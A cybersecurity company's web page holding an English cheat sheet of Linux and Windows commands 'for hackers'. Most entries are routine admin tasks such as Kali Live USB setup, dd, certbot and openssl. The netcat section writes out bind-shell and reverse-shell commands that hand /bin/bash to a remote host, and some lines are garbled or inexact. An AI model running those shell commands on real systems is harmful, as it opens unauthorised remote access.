Súlyos sebezhetőségre figyelmeztet a Fortinet Orosz állami hackerek forráskódokat lophattak el a Microsofttól Mi az a Ransomware-as-a-Service? 110 milliós bírságot kapott a KRÉTA meghekkelt fejlesztője Szoftverengedélyezési folyamat – Kiberbiztonsági ellenőrzőlista Letartóztatták a LockBit néhány tagját, kiadtak egy dekriptáló szoftvert Broken Object Level Authorization sérülékenység javítása, megelőzése A titkosított Signal üzenetküldő bevezetet a felhasználóneveket Információbiztonság vs. kiberbiztonság Felhőalapú kiberbiztonsági tanácsadás és audit Kiberbiztonsági partnerprogram CVSS: Common Vulnerability Scoring System Sérülékenységvizsgálat, penetrációs teszt és red teaming jellemzői Session Hijacking sérülékenység javítása, megelőzése Kövessen Minket LinkedInen is!

Useful Linux and Windows commands for hackers

WARNING! This is a half-public notes for hackers. Some commands are not complete or exact. Be careful and check the sintaxes before you use them.

Bash or ZSH promt text tuning

Paste this line into your .bashrc file where the promt text is specified.

PS1='\n┌─ ${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u💀\h\[\033[00m\] [$(date +%Y.%m.%d.) \t] [\[\033[01;34m\]\w\[\033[00m\]\]]\n│\n└─▸'

(or for your root user)

PS1='\n\[\033[01;31m\]\]┌─ ${debian_chroot:+($debian_chroot)}\u💀\h [$(date +%Y.%m.%d.) \t] [\w]\n│\n└─▸\[\033[00m\]\]'

Search in file contents with grep in Linux terminal

$ grep -rnw '/path/to/somewhere/' -e 'pattern'

Search by file type and move them or delete them

$ find recup_dir.* -iname "*.jpg" -exec mv {} IMG \; $ find recup_dir.* -iname "*.jpg" -exec rm {} \;

Make Kali Linux Live USB in Persistence mode

$ dd if=KALI_ISO_IMAGE.iso of=/dev/sdb conv=fsync bs=1M && sync

Make a Linux partition on free space

$ cfdisk /dev/sdb

Make an ext3 filesystem

$ mkfs.ext3 -L persistence /dev/sdb3

Name them as persistence

$ e2label /dev/sdb3 persistence $ mount /dev/sdb3 /mnt/ $ echo "/ union" > /mnt/persistence.conf $ umount /dev/sdb3

Kali Linux Live USB in Persistence mode (Encrypted)

$ dd if=ISO of=/dev/sdb bs=1M conv=fsync && sync $ start=$(du -bcm KALIISO.iso | tail -1 | cut -f 1 -d $'\t') $ end=$(echo `blockdev --getsize64 /dev/sdb`/1048576 | bc) $ parted /dev/sdb mkpart primary $start $end $ cryptsetup --verbose --verify-passphrase luksFormat /dev/sdb3 $ cryptsetup luksOpen /dev/sdb3 kali $ mkfs.ext3 -L persistence /dev/mapper/kali $ e2label /dev/mapper/kali persistence $ mount /dev/mapper/kali /mnt/ $ echo "/ union" > /mnt/persistence.conf $ umount /dev/mapper/kali $ cryptsetup luksClose /dev/mapper/kali

Boot from USB pendrive in Qemu virtual machine

$ qemu-system-x86_64 --enable-kvm -m 1024 -machine smm=off -hda /dev/sdb

Boot from USB pendrive in VirtualBox

$ VBoxManage internalcommands createrawvmdk -filename usblive.vmdk -rawdisk /dev/sdb

Then open the VMDK in VirtualBox

Remove, delete files (Recursive) if filename contains

$ find . -name "*.bak" -type f $ find . -name "*.bak" -type f -delete

Disable automount on GNOME (Linux)

$ gsettings set org.gnome.desktop.media-handling automount false

Disable automount on XFCE (Linux)

$ xfconf-query -c thunar-volman -p /automount-drives/enabled -T

Speed up USB write speed on Linux during dd

$ dd if=file of=/media/user/USB/output_file bs=1M conv=fsync && sync

Disable USB storage autosuspend on Linux

$ service laptop-mode stop $ nano /etc/laptop-mode/laptop-mode.conf ENABLE_LAPTOP_MODE_TOOLS=0 #!/bin/bash for dev in /sys/bus/usb/devices/*/power/control; do echo $dev echo on > $dev done for dev in /sys/bus/usb/devices/*/power/autosuspend; do echo $dev echo 0 > $dev done

Sending file with Netcat

On sender

$ nc -v -w 5 1234 -l < plaintext.txt

On receiver

$ nc -v -w 2 SOURCE_IP 1234 > plaintext.txt

Sending directory with Netcat

On sender

$ tar -cvf – DIRECTORY | nc -l 1234

On receiver

$ nc SOURCE_IP 1234 | tar -xvf

Remote shell with Netcat

On server

$ nc -lvp 1234 -e /bin/bash

On client

$ nc SERVER_IP 1234

Reverse remote shell with Netcat

On server

$ nc -lvp PORT

On client

$ nc -e /bin/bash SERVER_IP PORT

Simple webserver with Netcat

$ { echo -e “HTTP/1.1 200 OK\r\n”; cat netcat.html; } | nc -lkp 80

Disk copy/clone via network with Netcat

$ dd if=/dev/sda | nc -l 1234 $ nc -n IP 1234 | dd of=/dev/sda

Linux Screen scroll buffer

$ echo -e “\n\ntermcapinfo xterm ti@:te@” >> /etc/screenrc

Get listening processes in Linux terminal

$ lsof -n -i4TCP:http|smtp|... | grep LISTEN

Boot Kali Linux pendrive from GRUB command line

Press c for command line

root (hd1) find /TABTAB chainloader /EFI/boot/bootx64.img boot

Simple HTTP Server for a directory in Linux terminal

$ python -m SimpleHTTPServer 8000

Simple PHP Server for a directory with Let’s Encrypt SSL in Linux terminal

$ php -S 0.0.0.0:8080 -t .

Portforward 80 and 443

$ certbot certonly --webroot <DIRECTORY> --email mail@makay.net --agree-tos --rsa-key-size 4096 -d makay.net $ wget https://dl.eff.org/certbot-auto $ crontab -e * 3 * * 6 cd /home/makay && ./certbot-auto renew && service stunnel4 restart $ sudo nano /etc/stunnel/stunnel.conf #chroot = /var/run/stunnel #setuid = stunnel #setgid = stunnel fips = no cert = /etc/letsencrypt/live/datalink.makay.net/fullchain.pem key = /etc/letsencrypt/live/datalink.makay.net/privkey.pem [https] accept = 443 connect = 127.0.0.1:8080 #ciphers = ECDHE-RSA-AES256-GCM-SHA384 sslVersion = all options = NO_SSLv3 options = NO_TLSv1 options = NO_TLSv1.1 $ service stunnel4 restart

Generate self-signed OpenSSL certificate in Linux terminal

$ openssl genrsa -out key.pem 2048 $ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 365 $ openssl rsa -in key.pem -outform PEM -pubout -out public.pem

VirtualBox can’t see USB devices

$ sudo usermod -a -G vboxsf <USERNAME> $ sudo usermod -a -G vboxusers <USERNAME>

RELOGIN!

Mount Google Drive on Linux

$ mkdir ~/GoogleDrive $ sudo add-apt-repository ppa:alessandro-strada/ppa $ sudo apt install google-drive-ocamlfuse $ google-drive-ocamlfuse $ google-drive-ocamlfuse ~/GoogleDrive $ fusermount -u ~/google-drive (umount)

Enable long file paths on Windows

regedit.exe HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem LongPathsEnabled Value data: 1

A cikk másodközlése kizárólag kattintható forrásmegjelöléssel engedélyezett!

További cikkek
Megosztás